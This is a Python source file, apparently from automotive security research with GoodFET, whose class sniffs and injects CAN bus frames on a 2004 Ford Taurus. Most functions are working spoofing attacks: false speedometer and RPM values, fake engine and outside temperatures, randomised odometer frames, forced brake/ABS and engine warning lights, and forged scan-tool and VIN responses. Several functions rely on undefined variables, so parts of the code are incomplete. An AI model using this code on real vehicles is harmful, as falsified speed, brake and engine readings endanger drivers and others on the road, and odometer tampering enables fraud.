4 import csv, time, argparse;
8 from random import randrange
9 from GoodFETMCPCAN import GoodFETMCPCAN;
10 from experiments import experiments
11 from GoodFETMCPCANCommunication import GoodFETMCPCANCommunication
12 from intelhex import IntelHex;
18 class FordExperiments(experiments):
20 This class is a subclass of experiments and is a car specific module for
21 demonstrating and testing hacks.
23 def __init__(self, dataLocation = "../../contrib/ThayerData/"):
24 GoodFETMCPCANCommunication.__init__(self, dataLocation)
25 #super(FordExperiments,self).__init__(self) #initialize chip
28 def mimic1056(self,packetData,runTime):
31 self.spitSetup(self.freq)
32 #FIGURE out how to clear buffers
33 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
34 packet1 = self.client.rxpacket();
36 packetParsed = self.client.packet2parsed(packet1);
37 #keep sniffing till we read a packet
38 while( packet1 == None or packetParsed.get('sID') != 1056 ):
39 packet1 = self.client.rxpacket()
41 packetParsed = self.client.packet2parsed(packet1)
42 recieveTime = time.time()
43 packetParsed = self.client.packet2parsed(packet1)
44 if( packetParsed['sID'] != 1056):
45 print "Sniffed wrong packet"
47 countInitial = ord(packetParsed['db3']) #initial count value
49 #set data packet to match what was sniffed or at least what was input
52 if(packetData.get(idx) == None):
53 packet.append(ord(packetParsed.get(idx)))
55 packet.append(packetData.get(idx))
57 #### split SID into different regs
58 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
59 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
60 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
61 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
63 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
65 self.client.txpacket(packet);
67 while( (time.time()-recieveTime) < runTime):
68 #care about db3 or packet[8] that we want to count at the rate that it is
69 dT = time.time()-tpast
71 db3 = (countInitial + math.floor((time.time()-recieveTime)/0.2))%255
73 self.client.txpacket(packet)
77 self.client.MCPrts(TXB0=True)
78 tpast = time.time() #update our transmit time on the one before
82 def cycledb1_1056(self,runTime):
86 #FIGURE out how to clear buffers
87 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
88 packet1 = self.client.rxpacket();
90 packetParsed = self.client.packet2parsed(packet1);
91 #keep sniffing till we read a packet
92 while( packet1 == None or packetParsed.get('sID') != 1056 ):
94 packet1 = self.client.rxpacket()
96 packetParsed = self.client.packet2parsed(packet1)
97 recieveTime = time.time()
98 packetParsed = self.client.packet2parsed(packet1)
99 if( packetParsed['sID'] != 1056):
100 print "Sniffed wrong packet"
103 #set data packet to match what was sniffed or at least what was input
106 packet.append(ord(packetParsed.get(idx)))
108 packet[1] = packetValue;
111 #### split SID into different regs
112 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
113 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
114 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
115 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
116 # lower nibble is DLC
117 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
119 self.client.txpacket(packet);
121 while( (time.time()-recieveTime) < runTime):
122 #care about db3 or packet[8] that we want to count at the rate that it is
123 dT = time.time()-tpast
126 #temp = ((packetValue+1))%2
128 # pV = packetValue%255
134 self.client.txpacket(packet)
136 tpast = time.time() #update our transmit time on the one before
139 def getBackground(self,sId):
141 This method gets the background packets for the given id. This
142 is a simple "background" retriever in that it returns the packet
143 that is of the given id that was sniffed off the bus.
145 self.client.serInit()
147 self.addFilter([sId,sId,sId,sId,sId,sId])
148 packet1 = self.client.rxpacket();
150 packetParsed = self.client.packet2parsed(packet1);
151 #keep sniffing till we read a packet
152 startTime = time.time()
153 while( (packet1 == None or packetParsed.get('sID') != sId) and (time.time() - startTime) < 5):
154 packet1 = self.client.rxpacket()
157 packetParsed = self.client.packet2parsed(packet1)
158 if( packet1 == None or packetParsed.get('sID') != sId):
159 print "exiting without packet"
160 #print "returning", packetParsed
161 #recieveTime = time.time()
164 def cycle4packets1279(self):
165 self.client.serInit()
168 self.addFilter([1279, 1279, 1279, 1279, 1279, 1279], verbose = False)
169 packetParsed = self.getBackground(1279)
171 if (packetParsed[db0] == 16):
172 # if it's the first of the four packets, replace the value in db7 with 83
173 packetParsed[db7] = 83
174 # transmit new packet
175 self.client.txpacket(packetParsed)
177 # otherwise, leave it alone
178 # transmit same pakcet we read in
179 self.client.txpacket(packetParsed)
180 # print the packet we are transmitting
183 def oscillateMPH(self,runTime):
184 self.client.serInit()
186 #FIGURE out how to clear buffers
187 self.addFilter([513, 513, 513, 513,513, 513], verbose=False)
188 packetParsed = self.getBackground(513)
190 #set data packet to match what was sniffed or at least what was input
193 packet.append(packetParsed.get(idx))
195 packet[1] = packetValue;
198 #### split SID into different regs
199 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
200 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
201 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
202 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
203 # lower nibble is DLC
204 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
206 self.client.txpacket(packet);
207 startTime = tT.time()
208 while( (tT.time()-startTime) < runTime):
209 dt = tT.time()-startTime
210 inputValue = ((2.0*math.pi)/20.0)*dt
211 value = 35*math.sin(inputValue)+70
217 #packet[9] = int(value)
218 packet[5] = int(value)
220 self.client.txpacket(packet)
222 def oscillateTemperature(self,runTime):
228 self.client.serInit()
230 #FIGURE out how to clear buffers
231 self.addFilter([1056, 1056, 1056, 1056,1056, 1056], verbose=False)
232 packetParsed = self.getBackground(1056)
234 #set data packet to match what was sniffed or at least what was input
237 packet.append(packetParsed.get(idx))
239 packet[1] = packetValue;
242 #### split SID into different regs
243 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
244 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
245 packet = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
246 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
247 # lower nibble is DLC
248 packet[0],packet[1],packet[2],packet[3],packet[4],packet[5],packet[6],packet[7]]
250 self.client.txpacket(packet);
251 startTime = tT.time()
252 while( (tT.time()-startTime) < runTime):
253 dt = tT.time()-startTime
254 inputValue = ((2.0*math.pi)/20.0)*dt
255 value = 30*math.sin(inputValue)+130
257 #packet[5] = int(value)
264 self.client.txpacket(packet)
266 #tpast = time.time() #update our transmit time on the one before
271 #reset eveything on the chip
272 self.client.serInit()
274 duration = 20; #seconds
277 listenPacket = [2, 9, 6, 153, 153, 153, 153, 153]
279 #actual response by the car
280 #r1 = [34, 88, 0, 0, 0, 0, 0, 0]
281 #r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
282 #r3 = [16, 19, 73, 4, 1, 70, 65, 66]
284 r1 = [34, 88, 0, 0, 0, 0, 0, 0]
285 r2 = [33, 75, 50, 78, 51, 46, 72, 69 ]
286 r3 = [16, 19, 73, 160, 159, 70, 65, 66]
289 SIDlow = (responseID & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
290 SIDhigh = (responseID >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
291 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
292 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
293 # lower nibble is DLC
294 r1[0],r1[1],r1[2],r1[3],r1[4],r1[5],r1[6],r1[7]]
295 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
296 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
297 # lower nibble is DLC
298 r2[0],r2[1],r2[2],r2[3],r2[4],r2[5],r2[6],r2[7]]
299 packet3 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
300 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
301 # lower nibble is DLC
302 r3[0],r3[1],r3[2],r3[3],r3[4],r3[5],r3[6],r3[7]]
304 self.multiPacketSpit(packet0 = r1, packet1 = r2, packet2 = r3, packet0rts = True, packet1rts = True, packet2rts = True)
306 #filter for the correct packet
307 self.filterForPacket(listenID, listenPacket[0],listenPacket[1], verbose = True)
308 self.client.rxpacket()
309 self.client.rxpacket() # flush buffers if there is anything
310 startTime = tT.time()
311 while( (tT.time() -startTime) < duration):
312 packet = self.client.rxpacket()
314 sid = ord(packet[0])<<3 | ord(packet[1])>>5
315 if( sid == listenID):
316 byte3 = ord(packet[6])
317 if( byte3 == listenPacket[3]):
318 print "SendingPackets!"
320 self.multpackSpit(packet0rts=True,packet1rts=True,packet2rts=True)
322 def setScanToolTemp(self,temp):
323 self.client.serInit()
326 self.addFilter([2024, 2024, 2024])
327 self.client.rxpacket()
328 self.client.rxpacket()
329 self.client.rxpacket()
330 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
331 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
333 startTime = time.time()
334 #while((time.time() - startTime) < 10):
338 # catch a packet and check its db4 value
339 while (packet == None):
340 packet=self.client.rxpacket();
343 newTemp = math.ceil(level/1.8 + 22)
344 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
347 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
348 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
349 # lower nibble is DLC
350 ord(packet[5]),ord(packet[6]),ord(packet[7]),newTemp,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
352 # load new packet into TXB0 and check time
353 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
354 starttime = time.time()
356 # spit new value for 1 second
357 while (time.time()-starttime < 10):
358 self.multiPacketSpit(packet0rts=True)
360 def setEngineTemp(self,temp):
361 self.client.serInit()
364 self.addFilter([1056, 1056, 1056,1056,1056,1056])
365 self.client.rxpacket()
366 self.client.rxpacket()
367 self.client.rxpacket()
368 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
369 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
371 startTime = time.time()
372 #while((time.time() - startTime) < 10):
376 # catch a packet and check its db4 value
377 while (packet == None):
378 packet=self.client.rxpacket();
381 newTemp = int(math.ceil(level/1.8 + 22))
382 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
385 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
386 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
387 # lower nibble is DLC
388 newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
390 # load new packet into TXB0 and check time
391 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
392 starttime = time.time()
394 # spit new value for 1 second
395 while (time.time()-starttime < 10):
396 self.multiPacketSpit(packet0rts=True)
398 def overHeatEngine(self):
399 self.client.serInit()
402 self.addFilter([1056, 1056, 1056])
403 packet = self.getBackground(1056)
404 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
405 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
407 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
408 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
409 # lower nibble is DLC
410 0xfa,packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
411 startTime = time.time()
412 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
413 while( time.time()- startTime < 10):
414 self.multiPacketSpit(packet0rts=True)
416 def runOdometer(self):
417 self.client.serInit()
420 self.addFilter([1056, 1056, 1056])
421 packet = self.getBackground(1056)
422 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
423 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
424 odomFuzz = random.randint(1,254)
426 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
427 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
428 # lower nibble is DLC
429 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
431 startTime = time.time()
432 packet[6] = odomFuzz;
433 while( time.time()- startTime < 10):
434 odomFuzz = random.randint(1,254)
435 newPacket[6] = odomFuzz
436 self.client.txpacket(newPacket)
438 def setDashboardTemp(self, temp):
439 self.client.serInit()
442 self.addFilter([1056, 1056, 1056])
443 self.client.rxpacket()
444 self.client.rxpacket()
445 self.client.rxpacket()
446 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
447 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
449 startTime = time.time()
450 #while((time.time() - startTime) < 10):
454 # catch a packet and check its db4 value
455 while (packet == None):
456 packet=self.client.rxpacket();
459 newTemp = math.ceil(level/1.8 + 22)
460 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
463 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
464 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
465 # lower nibble is DLC
466 newTemp,ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
468 # load new packet into TXB0 and check time
469 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
470 starttime = time.time()
472 # spit new value for 1 second
473 while (time.time()-starttime < 10):
474 self.multiPacketSpit(packet0rts=True)
477 def warningLightsOn(self,checkEngine, checkTransmission, transmissionOverheated, engineLight, battery, fuelCap, checkBreakSystem,ABSLight, dashB):
479 if( checkBreakSystem == 1 or ABSLight == 1):
480 SIDlow = (530 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
481 SIDhigh = (530 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
482 print "looking for 530"
483 packet = self.getBackground(530)
485 packet2 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
486 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
487 # lower nibble is DLC
488 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
489 if( checkBreakSystem == 1 and ABSLight == 1):
491 elif( checkBreakSystem == 0 and ABSLight == 1):
493 elif(checkBreakSystem==1 and ABSLight == 0):
500 SIDlow = (1056 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
501 SIDhigh = (1056 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
502 print "looking for 1056"
503 packet = self.getBackground(1056)
505 packet1 = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
506 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
507 # lower nibble is DLC
508 packet['db0'],packet['db1'],packet['db2'],packet['db3'],packet['db4'],packet['db5'],packet['db6'],packet['db7']]
509 if( checkEngine == 1):
512 if( checkTransmission == 1):
515 if( transmissionOverheated == 1):
518 if( engineLight == 1):
530 self.client.serInit()
532 # load new packet into TXB0 and check time
533 self.multiPacketSpit(packet0=packet1,packet1=packet2, packet0rts=True,packet1rts=packet2rts )
534 starttime = time.time()
536 # spit new value for 1 second
537 while ((time.time()-starttime) < 10):
538 self.multiPacketSpit(packet0rts=True,packet1rts = packet2rts)
540 def fakeScanToolFuelLevel(self,level):
541 self.client.serInit()
544 self.addFilter([2024, 2024, 2024])
545 self.client.rxpacket()
546 self.client.rxpacket()
547 self.client.rxpacket()
548 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
549 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
551 startTime = time.time()
552 #while((time.time() - startTime) < 10):
556 # catch a packet and check its db4 value
557 while (packet == None):
558 packet=self.client.rxpacket();
560 level = int(level/.4)
561 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
564 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
565 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
566 # lower nibble is DLC
567 3,65,47,level,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
569 # load new packet into TXB0 and check time
570 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
571 starttime = time.time()
573 # spit new value for 1 second
574 while (time.time()-starttime < 10):
575 self.multiPacketSpit(packet0rts=True)
577 def fakeOutsideTemp(self,level):
578 self.client.serInit()
581 self.addFilter([2024, 2024, 2024,2024,2024,2024])
582 self.client.rxpacket()
583 self.client.rxpacket()
584 self.client.rxpacket()
585 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
586 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
588 startTime = time.time()
589 #while((time.time() - startTime) < 10):
593 # catch a packet and check its db4 value
594 while (packet == None):
595 packet=self.client.rxpacket();
597 newTemp = int(math.ceil(level/1.8 + 22))
598 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
601 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
602 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
603 # lower nibble is DLC
604 03,65,70,newTemp,0,0,0,0]
606 # load new packet into TXB0 and check time
607 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
608 starttime = time.time()
610 # spit new value for 1 second
611 while (time.time()-starttime < 10):
612 self.multiPacketSpit(packet0rts=True)
615 def fakeAbsTps(self,level):
616 self.client.serInit()
619 self.addFilter([2024, 2024, 2024])
620 self.client.rxpacket()
621 self.client.rxpacket()
622 self.client.rxpacket()
623 SIDlow = (2024 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
624 SIDhigh = (2024 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
626 startTime = time.time()
627 #while((time.time() - startTime) < 10):
631 # catch a packet and check its db4 value
632 while (packet == None):
633 packet=self.client.rxpacket();
635 abstps = int(math.ceil(level/.39))
639 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
640 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
641 # lower nibble is DLC
642 ord(packet[5]),ord(packet[6]),ord(packet[7]),abstps,ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
644 # load new packet into TXB0 and check time
645 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
646 starttime = time.time()
648 # spit new value for 1 second
649 while (time.time()-starttime < 10):
650 self.multiPacketSpit(packet0rts=True)
654 def mphToByteValue(self, mph):
655 return ( mph + 63.5 ) / 1.617
657 def ByteValuToMph(self, value):
658 return 1.617*ord(packet[9]) - 63.5
660 def setMPH(self, mph):
661 self.client.serInit()
664 self.addFilter([513, 513, 513])
665 self.client.rxpacket()
666 self.client.rxpacket()
667 self.client.rxpacket()
668 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
669 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
671 SID2 = (1056 & 0x07) << 5;
672 SID2high = (1056 >>3) & 0xFF;
673 packet_odometer = [SID2high, SID2, 0 ,0,8, 65, 0, 32, 120, 0, 0, 1, 247]
675 startTime = time.time()
676 #while((time.time() - startTime) < 10):
680 # catch a packet and check its db4 value
681 while (packet == None):
682 packet=self.client.rxpacket();
684 #print self.client.packet2str(packet)
686 #print "DB4 = %02d " %ord(packet[9])
688 #print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
690 # calculate our new mph and db4 value
692 newSpeed = self.mphToByteValue(mph)
693 #print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
696 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
697 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
698 # lower nibble is DLC
699 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
701 # load new packet into TXB0 and check time
702 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
703 starttime = time.time()
705 # spit new value for 1 second
706 while (time.time()-starttime < 10):
707 #self.multiPacketSpit(packet0rts=True)
708 odomFuzz = random.randint(1,254)
709 packet_odometer[6] = odomFuzz
710 self.multiPacketSpit(packet0=newPacket, packet1 =packet_odometer,packet0rts = True, packet1rts=True)
712 def speedometerHack(self, inputs):
714 self.client.serInit()
717 self.addFilter([513, 513, 513])
719 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
720 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
726 # catch a packet and check its db4 value
727 while (packet == None):
728 packet=self.client.rxpacket();
730 print self.client.packet2str(packet)
732 print "DB4 = %02d " %ord(packet[9])
733 mph = 1.617*ord(packet[9]) - 63.5
734 print "Current MPH = 1.617(%d)-63.5 = %d" %(ord(packet[9]), mph)
736 # calculate our new mph and db4 value
737 mph = mph + inputs[0];
738 newSpeed = ( mph + 63.5 ) / 1.617
739 print "Fake MPH = 1.617(%d)-63.5 = %d" %(newSpeed, mph)
742 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
743 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
744 # lower nibble is DLC
745 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),int(newSpeed),ord(packet[10]),ord(packet[11]),ord(packet[12])]
747 # load new packet into TXB0 and check time
748 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
749 starttime = time.time()
751 # spit new value for 1 second
752 while (time.time()-starttime < 1):
754 self.multiPacketSpit(packet0rts=True)
756 def rpmToByteValue(self, rpm):
757 value = ( rpm + 61.88 ) / 64.5
760 def ValueTorpm(self, value):
761 rpm = 64.5*value - 61.88
764 def setRPM(self, rpm):
765 self.client.serInit()
768 self.addFilter([513, 513, 513,513])
770 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
771 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
774 self.client.rxpacket()
775 self.client.rxpacket()
776 self.client.rxpacket()
778 startTime = tT.time()
779 while((tT.time() - startTime )< 10):
783 # catch a packet and check its db4 value
784 while (packet == None):
785 packet=self.client.rxpacket();
787 #print self.client.packet2str(packet)
789 #print "DB4 = %02d " %ord(packet[5])
791 #print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
793 newRPM = self.rpmToByteValue(rpm)
794 #print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
797 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
798 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
799 # lower nibble is DLC
800 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
802 # load new packet into TXB0 and check time
803 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
804 starttime = time.time()
806 # spit new value for 1 second
807 while (time.time()-starttime < 1):
808 self.multiPacketSpit(packet0rts=True)
810 def rpmHack(self, inputs):
812 This method will increase the rpm by the given rpm amount.
815 @param inputs: Single element of a list that corresponds to the amount the user
819 self.client.serInit()
822 self.addFilter([513, 513, 513])
824 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
825 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
826 startTime = tT.time()
827 while((tT.time() - startTime )< 10):
831 # catch a packet and check its db4 value
832 while (packet == None):
833 packet=self.client.rxpacket();
835 print self.client.packet2str(packet)
837 print "DB4 = %02d " %ord(packet[5])
838 rpm = 64.5*ord(packet[5]) - 61.88
839 print "Current RPM = 64.5(%d)-61.88 = %d" %(ord(packet[5]), rpm)
841 # calculate our new mph and db4 value
842 rpm = rpm + inputs[0];
843 newRPM = ( rpm + 61.88 ) / 64.5
845 print "Fake RPM = 64.5(%d)-61.88 = %d" %(newRPM, rpm)
848 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
849 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
850 # lower nibble is DLC
851 int(newRPM),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
853 # load new packet into TXB0 and check time
854 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
855 starttime = time.time()
857 # spit new value for 1 second
858 while (time.time()-starttime < 1):
859 self.multiPacketSpit(packet0rts=True)
861 def imbeethovenbitch(self):
864 ### USUAL SETUP STUFF ######
865 self.client.serInit()
867 self.addFilter([513, 513, 513,513])
868 SIDlow = (513 & 0x07) << 5; # get SID bits 2:0, rotate them to bits 7:5
869 SIDhigh = (513 >> 3) & 0xFF; # get SID bits 10:3, rotate them to bits 7:0
872 self.client.rxpacket()
873 self.client.rxpacket()
874 self.client.rxpacket()
879 #catch a packet to mutate
880 while (packet == None):
881 packet=self.client.rxpacket();
882 newPacket = [SIDhigh, SIDlow, 0x00,0x00, # pad out EID regs
883 0x08, # bit 6 must be set to 0 for data frame (1 for RTR)
884 # lower nibble is DLC
885 ord(packet[5]),ord(packet[6]),ord(packet[7]),ord(packet[8]),ord(packet[9]),ord(packet[10]),ord(packet[11]),ord(packet[12])]
888 # NOW THE FUN STUFF!!!!!
890 music = wave.open("../../contrib/ted/beethovensfifth.wav", 'r');
891 print "number of frames: %d " %music.getnframes()
892 print "number of channels: %d " %music.getnchannels()
893 print "sample width: %d " %music.getsampwidth()
894 print "framerate: %d " %music.getframerate()
895 print "compression: %s " %music.getcompname()
898 numFramesToRead = music.getframerate()*.05 # grab .1s of audio
906 sample = music.readframes(int(numFramesToRead)) # grab .1s of audio
910 for i in range(0, length,4):
911 runningSum += ord(sample[i]) #average the dual-channel
912 runningSum += ord(sample[i+2])
914 avg = math.fabs(runningSum/(length /2) -127) # we used 2 of every 4 frames, so divide length by 2
916 avg = (avg+avgprev)/2
919 val = int(avg*15 + 40) # normalize to speedometer range of values
921 print "speedometerVal = %f " %val;
922 print "speed = %f" %(1.617*val-63.5) # speed we're trying to display
924 if (val > 255): # ensure we don't run off acceptable range
929 newPacket[9] = int(val) # write it to the packet
931 # load new packet into TXB0 and check time
932 self.multiPacketSpit(packet0=newPacket, packet0rts=True)
933 starttime = time.time()
935 # spit new value for 1 second
936 while (time.time()-starttime < .1):
937 self.multiPacketSpit(packet0rts=True)
941 # normalize to our range of values (conversion 1.6167*x-63.5
945 #number of frames: 7133184
946 #number of channels: 2
947 #sample width: 2 --> 2 bytes per sample
950 def engineDiagnostic(self, data):
951 self.client.serInit()
953 self.addFilter([513, 513, 513,513,513,513])
955 startTime = tT.time()
956 while((tT.time() - startTime ) < 15):
959 #catch a packet to decode
960 while (packet == None):
961 packet=self.client.rxpacket();
963 rpm = 64.5 * ord(packet[5]) - 61.88
964 mph = 1.617 * ord(packet[9]) - 63.5
965 print "putting data in"
966 data.put("Engine RPM: %d Current Speed: %d mph\n"%(rpm, mph))
973 if __name__ == "__main__":
975 parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,description='''\
977 Run Hacks on a Ford taurus 2004:
983 parser.add_argument('verb', choices=['speedometerHack', 'rpmHack', 'thefifth']);
984 parser.add_argument('-v', '--variable', type=int, action='append', help='Input values to the method of choice', default=None);
987 args = parser.parse_args();
988 inputs = args.variable
989 fe = FordExperiments("../../contrib/ThayerData/");
991 if( args.verb == 'speedometerHack'):
992 fe.speedometerHack(inputs=inputs)
993 if( args.verb == 'rpmHack'):
994 fe.rpmHack(inputs=inputs)
995 elif( args.verb == 'fakeVIN'):
997 elif( args.verb == 'thefifth'):
998 fe.imbeethovenbitch()